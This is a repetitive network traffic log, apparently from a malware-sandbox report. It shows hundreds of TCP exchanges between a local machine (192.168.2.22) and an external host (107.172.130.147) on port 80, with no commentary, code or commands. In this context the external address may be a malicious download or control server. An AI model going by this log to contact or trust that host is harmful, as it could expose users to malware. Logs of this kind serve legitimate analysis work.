                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
